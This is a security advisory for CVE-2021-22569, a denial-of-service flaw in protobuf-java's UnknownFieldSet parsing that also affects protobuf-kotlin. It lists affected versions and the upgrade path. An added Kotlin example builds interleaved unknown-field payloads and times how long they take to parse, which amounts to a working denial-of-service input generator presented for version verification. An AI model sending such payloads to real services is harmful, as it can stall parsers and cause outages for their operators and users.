CVE-2021-22569

Denial Of Service in maven/com.google.protobuf/protobuf-kotlin

Identifiers

CVE-2021-22569, GHSA-wrvw-hg22-4m67, GMS-2022-6

Package Slug

maven/com.google.protobuf/protobuf-kotlin

Vulnerability

Denial Of Service

Description

An issue in protobuf-java (the runtime that protobuf-kotlin builds on) allowed unknown fields in a serialized message to be interleaved in such a way that com.google.protobuf.UnknownFieldSet processed them out of order. A small malicious payload can occupy the parser for several minutes: the interleaving creates large numbers of short-lived objects, which cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions.
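The following is an added example, not code from the advisory or from the protobuf project. It builds two payloads with identical content, one with the field numbers interleaved on every field (the shape the description above refers to) and one with each field number in a single contiguous run, parses both through UnknownFieldSet (the code path the advisory names) and reports the wall-clock difference. The field numbers, the varint values and the round count are arbitrary choices for this example, and the version string read from the jar manifest is an assumption that may come back null depending on how the artifact was packaged; the definitive check is the dependency version resolved by your build.

```kotlin
import com.google.protobuf.CodedOutputStream
import com.google.protobuf.UnknownFieldSet
import java.io.ByteArrayOutputStream

// Constructed payload: `rounds` repetitions of the pair (fieldA, fieldB), so the
// parser sees the field number change on every single field it reads.
// Field numbers and round count are arbitrary choices made for this example.
fun interleavedPayload(fieldA: Int, fieldB: Int, rounds: Int): ByteArray {
    val bytes = ByteArrayOutputStream()
    val out = CodedOutputStream.newInstance(bytes)
    repeat(rounds) {
        out.writeUInt64(fieldA, 1L) // one tag byte plus a one-byte varint
        out.writeUInt64(fieldB, 1L)
    }
    out.flush()
    return bytes.toByteArray()
}

// Same fields and values, but grouped so each field number appears in one
// contiguous run. Serves as the baseline the interleaved payload is compared to.
fun groupedPayload(fieldA: Int, fieldB: Int, rounds: Int): ByteArray {
    val bytes = ByteArrayOutputStream()
    val out = CodedOutputStream.newInstance(bytes)
    repeat(rounds) { out.writeUInt64(fieldA, 1L) }
    repeat(rounds) { out.writeUInt64(fieldB, 1L) }
    out.flush()
    return bytes.toByteArray()
}

// Parse the bytes as raw unknown fields and return (elapsed milliseconds,
// number of varints recovered for fieldA). Both payloads must yield the same count.
fun timeParse(payload: ByteArray, fieldA: Int): Pair<Long, Int> {
    val start = System.nanoTime()
    val parsed = UnknownFieldSet.parseFrom(payload)
    val elapsedMs = (System.nanoTime() - start) / 1_000_000
    return elapsedMs to parsed.getField(fieldA).varintList.size
}

fun main() {
    // Assumption: protobuf-java's manifest carries Implementation-Version; if it
    // does not, this prints "unknown" and the build's dependency report is authoritative.
    val version = UnknownFieldSet::class.java.`package`?.implementationVersion ?: "unknown"
    println("protobuf-java on classpath: $version (fixed in 3.18.2 and 3.19.2)")

    val fieldA = 1
    val fieldB = 2
    // 4 bytes per round, so 50_000 rounds is a 200 KB message. On a version
    // before the fix this can run for a very long time; lower `rounds` if needed.
    val rounds = 50_000

    val interleaved = interleavedPayload(fieldA, fieldB, rounds)
    val grouped = groupedPayload(fieldA, fieldB, rounds)
    check(interleaved.size == grouped.size) { "payloads should be the same size" }

    val (groupedMs, groupedCount) = timeParse(grouped, fieldA)
    println("grouped:     ${interleaved.size} bytes, $groupedCount varints, ${groupedMs} ms")

    val (interleavedMs, interleavedCount) = timeParse(interleaved, fieldA)
    println("interleaved: ${interleaved.size} bytes, $interleavedCount varints, ${interleavedMs} ms")
    check(groupedCount == interleavedCount) { "both payloads carry the same fields" }
}
```

Run it once with protobuf-java 3.18.1 (or 3.19.1) on the classpath and once with 3.18.2 (or 3.19.2): the byte counts and recovered field counts are identical in both runs, so any gap between the two timings is attributable only to the order of the fields. To confirm which version a build actually resolves, use `./gradlew dependencies --configuration runtimeClasspath` or `mvn dependency:tree` and look for `com.google.protobuf:protobuf-java`, since protobuf-kotlin pulls it in transitively.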

Affected Versions

All versions before 3.18.2, all versions starting from 3.19.0 before 3.19.2

Solution

Upgrade to versions 3.18.2, 3.19.2 or above.

Last Modified

2022-01-19
